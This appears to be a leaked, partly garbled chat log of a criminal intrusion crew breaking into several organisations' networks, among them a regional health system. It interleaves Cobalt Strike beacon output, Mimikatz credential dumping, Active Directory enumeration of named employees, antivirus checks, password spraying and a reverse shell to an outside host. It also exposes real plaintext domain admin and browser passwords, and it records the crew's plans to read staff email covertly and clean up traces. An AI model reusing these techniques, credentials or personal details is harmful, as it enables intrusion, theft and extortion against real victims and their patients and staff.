[+] host called home, sent: 836651 bytes
[+] received output:

[*] Dumping lsass (572) to C:\WINDOWS\Temp\debug.bin
[X] Dump failed: False

[+] received output:

[*] Executing loaded Mimikatz PE

  .#####.   mimikatz 2.1.1 (x64) built on Jul 7 2018 03:36:26 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ## /*** Benjamin DELPY `gentilkiwi' ( benjamin@gentilkiwi.com )
 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
 ## v ## Vincent LE TOUX ( vincent.letoux@gmail.com )
  # # '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening

``cmelliott
this one didn't get dumped
this one is not on siteada I and so dump the logonpas if they are on site then look for their pku the two remaining hashes have not passed on kmd5 only with the label IT there is a clear only from gsnelsonjuju the result is kind of clear tasks `` ``
10.5.50.228:445 (platform: 500 version: 5.1 name: IT03 domain: LRHC)
``````
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
``+ go to the trustshersti their pc and check the mail from the list above take the guys with a descriptive ITa, well this know) in any case you have a hooked socket, all reopened messages (reset label "unread") because of your actions back, so do not delete anything, do not write, do not call, do not forward) `` ``
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>sAMAccountName: slarsen
>description: Listed as Shawn Larsen account shawn
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
 
>sAMAccountName: PRHADMIN
>description: MEI's and Grant's Admin account for lrhc
```
```
>memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning

>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: llpearso
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: mtsuser
>description: Pargon Admin
 
>sAMAccountName: Administrator
>description: Built-in account for administering the computer/domain
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: magrel
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: frsecure
>description: FRSECURE account for network test
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: parafhir
>description: FHIR user
 
>sAMAccountName: sbgravning
 
>sAMAccountName: tableauadmin
 
>sAMAccountName: ocmagrel
 
>sAMAccountName: ocansi
 
>sAMAccountName: ocbdi
 
>sAMAccountName: occoldagt
 
>sAMAccountName: ocsign
 
>sAMAccountName: ocbatchcmp
 
>sAMAccountName: ocile
 
>sAMAccountName: ocindexagt
 
>sAMAccountName: ocpurge
 
>sAMAccountName: octransagt
 
>sAMAccountName: ocweb
 
>sAMAccountName: ocfaxin
 
>sAMAccountName: ocadmin
 
>sAMAccountName: OCARCREL
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: djkrog
>description: CIS
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: llpearso
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: djkrog
>description: CIS
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: intranet
>description: LRHC's Intranet Access
 
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
In addition to not taking anything there, can you tell me if there is something we do not know? Do you need to tell the rules or is it that obvious? search for his username, hostname, etc. through the local exxcheck his email in chrome no credentials saved, only visible in the login gotda, authorization asked what was shown? did you run the client? in chrome history showed that he logged in to the sphere
+ he had a client installed and you said he was gone for a few days you said you found where he had the client installed I don't understand something) only found that he went to the sphere - nothing else so what did you find? 3) we went through the RDP - he was gone for several days so here's the plan:
1) now look more "interesting" people from the groups above and the classics look at their pk
2) go to their mail server under the codes of your internal DA and other IT staff and look at their correspondence for access on the sphere
3) wait for `gsnelson` to get off the car and go to rp and try to get in
4) get into the trust, it looks like there's an admin one {\10.91.19.35\volume_1}) go to another trustshaloon and did not say))) I took the quarantine through another domain, how did you take it off?) I did) @user7 you took the quarantine from there[ ](https://mediaeveryone.com/group/lrhc-org?msg=MQjLTQ8JLjE8EH4qy) is there a hell of a lot of info?
Shared resources at 10.91.19.35

DNS-323

Share name Type Used as Comment

-------------------------------------------------------------------------------
lp Print USB Printer
Volume_1 Disk
web_page Disk Enter Our Web Page Setting
The command completed successfully.

``````
Shares for 10.91.19.35:
	[--- Unreadable Shares ---]
		lp
		IPC$
	[--- Listable Shares ---]
		Volume_1 web_page
``Give it net viewnas in quarantine...hmmm in quarantine is there such a thing, are we interested?
10.91.19.35:445 (platform: 500 version: 4.9 name: IT-DLINK-NAS domain: ELEAH)

	[--- Listable Shares ---]
		Volume_1 web_page
``Win authorization didn't go through either, didn't get the root pass? Did you try it? Vin 10? Was it in the processes on the computer? Do you have his clipass in his processes? Was there a websphere client in his processes, but the gootlogin dude gsnelson has access?
 where the websphere client was.
1) do we have access to the rdp there?
2) what is his username?

``Yes, I'm collecting a list so is anyone here? ``memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local``
this one is not needed1) do we have access to rdp there?
2) his login what? where was the websfer client all others here list login name + its title, description``.
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local
>memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local
``[ ](https://mediaeveryone.com/group/lrhc-org?msg=f7BhjsG2Dhj4biXts) yu[ ](https://mediaeveryone.com/group/lrhc-org?msg=X9DRqmQNLciwimKcf) who?
-------------------------------------------------------------------------------
Admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson nmsapps OnPremMigAdmin1
OnPremMigAdmin2 OnPremMigAdmin3 PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
found one where you went to the sphere, no credentials saved give me a list and I'll try to look outside the domain they don't have a normal admin computer labeled
i went to the oushkek where they should have admin PCs - i told you gsnelson but there are iis and printers everywhere from Administrator
on one machine was a link to veeam.com without any credit process YES will be decent on a large number of servers how many got around did not count
i go where there are processes on rdp session or hanging process yes
gsnelson has a spheres client on his truck, i try to find out how many admins and itspecialists/how many have bypassed?about so many sessions what? @user4 what did i ever say about sessions?
192.168.0.247
 192.168.0.253
```
they have rdp access to these machines can't session gopher?[ ](https://mediaeveryone.com/group/lrhc-org?msg=zXPB8m4QmuixuSYr2) They don't have SSHCPNBACKUP.lrhc.local if only the keylogger catches them there's nothing
They don't save passwords.
+ kind of go to the sphere through the client, not through the web then shoot without a sessionthere sits YES, open chrome - 10.91.18.119
sessions do not fly there is a list of software on the machines ``{lrhprofiles\admins\pcsysteminfo`` here are files on all computers in them is specified who LA on what machine ``
```
  UseWUServer : True
  Server : http://prh-print01:8530
  AlternateServer :
  StatisticsServer : http://prh-print01:8530

```
``````
--- Chromium Credential (User: prhlab) ---
URL : https://www.api-pt.com/login.aspx
Username : 64413
Password : h(e? ?5S

--- Chromium Credential (User: prhlab) ---
URL : https://www.instrumentationlaboratory.com/us/en
Username : manelite
Password : ??? o*?

--- Chromium Credential (User: prhlab) ---
URL :
Username : lrhc\nlarson
Password : ??=?rGK

--- Chromium Credential (User: prhlab) ---
URL :
Username : lrhc:\nlarson
Password : Jih.63*d

--- Chromium Credential (User: prhlab) ---
URL :
Username : nlarson
Password : Jih.63*d
```
```
>sAMAccountName : bnlarson
>memberOf : CN=LRHC_Replica_Users
```192.168.0.90```
Bookmarks (cblascyk):

    Name : WorkPlace Login
    URL : http://10.10.30.212/workplace/Central/Login.aspx?Message=&Popup=0&ONLOGIN=http%3a%2f%2f10.10.30.212%2fworkplace%2fCentral%2fDashboard.aspx

    Name : CelériTime
    URL : http://10.10.30.223/ctapp/Login.aspx


Bookmarks (jschmidgall):

    Name : CelériTime
    URL : http://10.10.30.223/ctapp/Login.aspx

    Name : Workplace
    URL : http://10.10.30.212/workplace/Central/Dashboard.aspx
```192.168.0.192```
CN=OCMAGREL,OU=Service Admins,
````ocmagrel`` this username is found everywhere``
10.10.39.194:9443
10.10.39.194:9087
10.10.39.194:9084
10.10.39.194:8084
10.10.39.194:7444
10.10.39.194:6502
10.10.39.194:6501
10.10.39.194:5580
10.10.39.194:5480
10.10.39.194:2020
10.10.39.194:2015
10.10.39.194:2014
10.10.39.194:2012
10.10.39.194:636
10.10.39.194:443
10.10.39.194:389
10.10.39.194:88
10.10.39.194:80
Good night, good night, good night... 3 a.m. we'll close by tonight and you'll have 7 hours to get ready... that's it 8 a.m. let's sleep it off, just tell me what time to be there? if you have any suggestions ready to listen so what? enough time? 7-8 p.m. Evening in any case, it should be done during their working hours when the admins will be in the networkcalculate that you need to find access to the sphere after 3 a.m. So either end before 5 at local time for sure will not runaday laterWhat time are we going to?i.e. for today i can't on sunday so why don't we reschedule for tomorrow?) and we won't scan the whole range. they just scanned without specifying ports[ ](https://mediaeveryone.com/group/lrhc-org?msg=na3M7jsTWpYMhC59u) everything was strange sphere, no web interface, no ccsh... they may have changed the ports - let's check it outThey have a lot of places + they may go to the lin through itWhy are you looking for vnts?
service RealVNC.SYSTEM.vncserver.vncagent.978162299 -_hash 6023144d82c1866db090b27f884c921c310b505ca9dd0f5be587de06362dc59b
and ea-check the accesses themselves dare guys found, but they say there are still empty cars admins? well then while we chisel the current should be finished but from Mon there will be other work da(and tomorrow is Saturday (well, in general the line is one and in one domain leave for tomorrow? but I have not yet checked it) well if trusts remote from each other I think daona be in all 3? so we will not close it today)
 There are 3 trusts.
and in none of them yet found a sphereuser9 it is Access is denied. rash that with the system, that with the tokenTo remove something need to be in the process user?[ ](https://mediaeveryone.com/group/lrhc-org?msg=2ibwanQe7KArEiJAb) these?(Not one computer from 45 containing in the name of adm is not pinged?
User: gsnelson - IP Address: 10.91.19.227
User: gsnelson - IP Address: 192.168.0.89
 
User: nmsapps - IP Address: 10.10.30.24
 
User: Administrator - IP Address: 10.10.39.105
User: Administrator - IP Address: 10.10.30.123
 
User: PsSupport - IP Address: 10.10.30.249
 
User: PRHADMIN - IP Address: 10.91.19.7
``Rumor has it, I'll try it through tulkit, it seems to work better with sniper.
[-] Invoke_3 on EntryPoint failed.

Have you tried the sharpshooter case?
>sAMAccountName: baleitch
>memberOf: CN=G VNC_User
``````
>sAMAccountName: gdhoff
>memberOf: CN=G VNC_User
``````
beacon> shell ping Scott.lrhc.local
[*] Tasked beacon to run: ping Scott.lrhc.local
[+] host called home, sent: 176 bytes
[+] received output:
Ping request could not find host Scott.lrhc.local. Please check the name and try again.

``````
>dNSHostName: Scott.lrhc.local
>memberOf: CN=Administrators
```
```
dn:CN=Hanson\, Scott
>sAMAccountName: smhanson
>memberOf: CN=CIS_VNC
>memberOf: CN=Backup Notification
``````
192.168.254.36:445 (platform: 500 version: 5.1 name: EMEDWRKSTN domain: WORKGROUP)
``````
    LRH-RDP01.lrhc.local
```
is written in web)you can use a torbrower to check if this kind of thing ```
OfficeMate®, the most widely used server-based practice management solution in the optical industry, offers a secure experience with extensive tools to manage billing, appointment scheduling and inventory
``written into sql''.
>dNSHostName: OFFICEMATE.lrhc.local
>servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:62380
>servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:OMSQL
>servicePrincipalName: TERMSRV/OFFICEMATE.lrhc.local
>servicePrincipalName: TERMSRV/OFFICEMATE
>servicePrincipalName: WSMAN/OFFICEMATE.lrhc.local
>servicePrincipalName: WSMAN/OFFICEMATE
>servicePrincipalName: RestrictedKrbHost/OFFICEMATE
>servicePrincipalName: HOST/OFFICEMATE
>servicePrincipalName: RestrictedKrbHost/OFFICEMATE.lrhc.local
>servicePrincipalName: HOST/OFFICEMATE.lrhc.local
``honestly sort the fuck out in smtp?'' apparently this fuckin' thing is prefixed by ``LRHR````
SMTP:
    SAGESRVR.lrhc.local
    LRHRECRUIT.lrhc.local
``lazange seems to be pulling everything@tl1 Tell me if there is something for coba to pull the vnc-credits from, as it seems to me ``
vncserver.exe
vmtoolsd.exe
``It looks like a separate category judging by its name, not sql`` at all
>dNSHostName: SAGESRVR.lrhc.local
>servicePrincipalName: SMTPSVC/SAGESRVR.lrhc.local
>servicePrincipalName: SMTPSVC/SAGESRVR
>servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local:1433
>servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local
>servicePrincipalName: TERMSRV/SAGESRVR.lrhc.local
>servicePrincipalName: TERMSRV/SAGESRVR
>servicePrincipalName: WSMAN/SAGESRVR.lrhc.local
>servicePrincipalName: RestrictedKrbHost/SAGESRVR.lrhc.local
>servicePrincipalName: HOST/SAGESRVR.lrhc.local
>servicePrincipalName: WSMAN/SAGESRVR
>servicePrincipalName: RestrictedKrbHost/SAGESRVR
>servicePrincipalName: HOST/SAGESRVR
``[ ](https://mediaeveryone.com/group/lrhc-org?msg=8ZDxnERPvj8tGcfR4) then why not a thermal server?
    SAGESRVR.lrhc.local
``[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Kcbqn5Nru9WgNaqns) I'm busy)²svot and fine)oy just about me)strong, nimble, brave and skillful and no one told me that you're short of peopleuser9 needs one volunteer for another mission
 Directory of E:\Backup\VeeamConfigBackup\BGUKHOVEEAM

20/01/2021 11:06 AM <DIR> .
20/01/2021 11:06 <DIR> .
16/01/2021 11:06 396,372,097 BGUKHOVEEAM_2021-01-16_11-00-24.bco
17/01/2021 11:06 396,398,582 BGUKHOVEEAM_2021-01-17_11-00-23.bco
18/01/2021 11:06 396,424,953 BGUKHOVEEAM_2021-01-18_11-00-22.bco
19/01/2021 11:07 396,442,650 BGUKHOVEEAM_2021-01-19_11-00-11.bco
20/01/2021 11:06 396,456,968 BGUKHOVEEAM_2021-01-20_11-00-23.bco
               5 File(s) 1,982,095,250 bytes
               2 Dir(s) 19,409,371,136 bytes free
````CITYISLANDSVR` also only sofos+on dk? sitbelt also can`t detect no red
at least on these
```
bally44hodc1
bgukhoveeam
if there's really only sofos there, then octam red check on googleogleogle psedr_query you can't determine everything once again
[+] Determining what EDR products are installed on BGAZRDC01...
[+] host called home, sent: 358 bytes
[+] No EDR products found! Operate at your own risk!
[+] Determining what EDR products are installed on BALLY44HODC1...
[+] host called home, sent: 60 bytes
[+] No EDR products found! Operate at your own risk!
```
and no EDR products are found on DK.
 Determining what EDR products are installed on WEBMARSHAL...
[+] host called home, sent: 359 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Sophos Found!
|"Tell me right away what AV is on the servers.
DA:
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?
BALLYMOREGROUP\CITAdministrator L0ndonT0w3r2009!
BALLYMOREGROUP\bespadmin drithEyuDAZ07ac




Username : BALLYMOREGROUP\admin
Domain : 192.0.2.3
Password : -6&J{*n]e73e]Mm
    192.0.2.3:445
    192.0.2.3:443
    192.0.2.3:80

Username : BALLYMOREGROUP\admin
Domain : 19.2.0.25
Password : Complete2!
    Pinging 19.2.0.25 with 32 bytes of data:
    Request timed out.  100% loss
``````
192.0.2.3 admin -6&J{*n]e73e]Mm
192.0.2.25 admin Complete2!
```
sat sat sat in chat help @user4 went to offdocked putlibslimeyvpn knocked out sit the fuck down to look for cars without sofosatam better yet work through it look for vpn`BALLYMOREGROUP\bespadmin drithEyuDAZ07ac````
====== AntiVirus ======

  Engine : Sophos Anti-Virus
  ProductEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe
  ReportingEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
```
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 58 bytes
[-] could not open \localhost\\C$\windows\sysnative\drivers\*: 3
[+] No EDR products found! Operate at your own risk!
Tell me what's changed first. The passwords have been changed.
mimic has been disabled in some places and it works and crashes the session where it has not been disabled
sessions die from almost everything (request dir remote/start the case) like russian roulette in essence
us which is 192.0.2.3 was either knocked out or moved to another address@user7
niceadd.com quite enoughtostay yourself from 5 to 10 if you have active sessions of 10 + there slip for 10 minutes not to spam Leave not many sessions good night do not forget to clean the files sleepy night 150slip happy sessions in slip to monday cheers well done everyone thank you +))) tell more @user3 not to be late Mon by 10 am start closing da, lets do so by 10 am probably
they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no sense to go on a working day in general such things on the desktop, more shortcuts to disks how to find it? where? on the desktop? chanson mdb database where did you find it? yes we did? if you found access to the center by what time? well, then me and @user8 no sessions(
```
>lastLogon: 132304000305532732
``Look up when did he even log in.``
maybe a long time ago is unlikely)mb he had a lockout on 1 try? well, if you do not lock it specifically, it is unlikely you have locked it)) do not worry)0 in hell info can look at the polzak there is a question of how much badpasswordcount, or in hell info[ ](https://mediaeveryone.com/group/vpinc-net?msg=ooEe2x6qAW8HRqN6A) have not look at the users can look in hell it? it means that he is locked before, locked just now or at another attempt to be locked `` ``
Account lockout detected
``I don't understand that conclusion. It's probably not locked but ``was'' locked.
[-] 10.100.1.101:445 - 10.100.1.101:445 - Could not connect
2 mina lol, session broke down this one broke down all fails with this password let everyone in yes just if you didn't exactly brute force this user or something like that you had nothing to do with it, kznm
```
[-] 10.100.1.101:445 - Account lockout detected on 'jonb', skipping this user.
kerb is not brutalized yet kerb is probably not going to hit anything if it doesn't work for yes or other service you can try
but in general you're right and it's more serviceable can SharpSpray run with this password?))nsupport ;))alas(``
[-] 10.100.1.101:445 - 10.100.1.101:445 - Failed: 'orange_fact\Svc_ADSync:Sync!T4u',
Try that one tooSvc_ADSync might work because it's a service account
see if there are other users in the domain with the Svc_ prefix.
because the name of the account ends with the phrase from the passwordIn fact, you can just do smb_login to check if someone from the domain admin has such a password. what is the profit of autobrouting here?
```
[-] 10.113.1.126:445 - 10.113.1.126:445 - Failed: 'orange_fact\Svc_CRMailSync:Sync!T4u',
``Try smb_autobrute on this pass, it turns out it has no LA rights anywhere, right? I guess this Svc_CRMMailSync doesn't have a wheelbarrow.

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
vpinc.net
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
orange_fact\color764

``aahhhh, that's what I told him without the domain.)
it's just that their domain is vpinc.net
and whoami shows the other one, what did you check it with by the way?
Credentials
===========

host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.100.1.29 10.100.1.63 445/tcp (smb) Svc_CRMailSync Sync!T4u Password
10.100.1.63 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.1.79 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.1.101 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.5.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.100.5.3 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.101.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.102.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.104.1.11 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.105.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.106.1.8 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.109.1.21 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.110.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.113.1.2 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
10.250.1.41 10.100.1.63 445/tcp (smb) Svc_CRMMailSync Sync!T4u Password
why would he have the correct username/password? You'll still get it checked at LA with domain?
orange_fact\Svc_CRMailSync:Sync!T4u
How do you run it? Almost all the hosts have been through, but none with "admin" tagged on them. Any success?
Global Group memberships *Domain Users
``Let's see what groups he's in,`` net user Svc_CRMMailSync /domoo
great``.
[+] 10.100.1.63:445 - 10.100.1.63:445 - Success: 'orange_fact\Svc_CRMMailSync:Sync!T4u'

``Are there any kerbs from here?
Check to see if the pass is valid?
dn:CN=Svc_CRMMailSync,OU=Orange City,OU=Service Accounts,DC=vpinc,DC=net
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Svc_CRMailSync
>description: Service Account for CRM Mail Sync in O365
>givenName: Svc_CRMMailSync
``````
 <add key="impersonationUserName" value="Svc_CRMMailSync@vpinc.net" />
    <add key="impersonationPassword" value="Sync!T4u" />
``:thumbsup:from what - it's not clear hashes are there```.
\\10.100.1.89\ldlogon\LDHashDir
``````
LicenceNumber: 1AF8-140128-081558
Serial Number: 1AF8-0004B3-28D9DE3B
``Then go through the ones that are available - crawl with your hands, look for pvsh bat scripts of all kindsvot full
in the past highlighted interesting and already scanned everything? so few cars? as well as c$admin$ there is nowhere except his output yes?
shell SharpShares.exe shares > shares.txt
``Works check in lab, i don't chekalon through shell windows won't open any? and stop if dropped? i think not(but through `>> won't work? alas no SharpShares output to file?:man_shrugging:but what could you block it with?
beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.

System error 5 has occurred.

Access is denied.

``We must have blocked it...
```
beacon> shell net user panderson /dom
[*] Tasked beacon to run: net user panderson /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.

System error 5 has occurred.

Access is denied.

``I'll start it.'' And SharpShares? on a working session just killed it just did not work - hangs with what error? crashes process did you run it online? + cleartext creed no under skul and 17-010 yesterday tried
that's it, it's gone.
farm is still off?[*] tasked beacon to spawn (x86) windows/foreign/reverse_https (slypad.com:443:443) passnulnet, 15 hoursftp exploits here is not the best solution and hardly a working session? found ldap and pointed it in the batken how to do?) me in the chat there is not a nickname)(@user9 here in bellymore who will stay here?there's one left for work, i'm still digging around at least have you cleaned the bash behind you? there's one lin with ssh access, but nothing good to come out of there either, no way to move forward so far, no way to do anything here?
172.16.63.21
172.16.50.13
172.16.55.49
172.16.59.203
172.16.60.210
172.16.61.44
172.16.61.150
172.16.61.178
172.16.61.179
172.16.64.151
172.16.65.88
172.16.66.162
172.16.66.247
172.16.68.102
172.16.68.169
172.16.68.196
172.16.69.212
172.16.100.79
172.16.100.133
172.16.200.19
172.16.200.21
172.16.200.22
172.16.200.24
172.16.200.39
172.16.200.46
172.16.200.49
172.16.200.50
172.16.200.55
172.16.200.56
172.16.200.59
172.16.200.60
172.16.200.67
172.16.200.74
172.16.200.79
172.16.200.100
172.16.200.101
172.16.200.103
172.16.200.111
172.16.200.114
172.16.200.122
172.16.200.123
172.16.200.128
172.16.200.129
172.16.200.130
172.16.200.132
172.16.200.133
172.16.200.139
172.16.200.140
172.16.200.147
172.16.200.149
172.16.200.157
172.16.200.162
172.16.200.164
172.16.200.165
172.16.200.166
172.16.200.167
172.16.200.170
172.16.200.172
172.16.200.174
172.16.200.183
172.16.200.184
172.16.200.185
172.16.200.188
172.16.200.189
172.16.200.191
172.16.200.192
172.16.200.194
172.16.200.201
172.16.200.203
172.16.200.206
172.16.200.210
172.16.200.214
``````

[+] 172.16.200.24:445 - 172.16.200.24:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.59:445 - 172.16.200.59:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.55:445 - 172.16.200.55:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.50:445 - 172.16.200.50:445 - Success: 'snu\alangvardt:Crimson24!
``private part of the nixam 600 + ips was rasskandy already understood the old session is outkst if you do not know, logging in under the account of two at the same time can not go there I did not go, I can not tell you and most likely logging in under vpn[ ] (https://mediaeveryone.com/group/snu-edu?msg=usQ55fv2NeQYzKhZC) I even hz where you login) ie here ok? I have doubts) and what's the difference
they just have some function apparentlya it staffkirase 3-4 sawhere should beZEWS there morewas met already) are used by some software that works as AD factories))))there are names servookvig saw more tanos in what the scanner, loki ``
[+] 172.16.200.67:445 - Host is running Windows 10 Education (build:18363) (name:THOR) (domain:AD)
[*] 172.16.200.100:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.16.200.100:445 - Host could not be identified: OS400 V5R4M0 (iSeries Support for Windows Network Neighborhood)
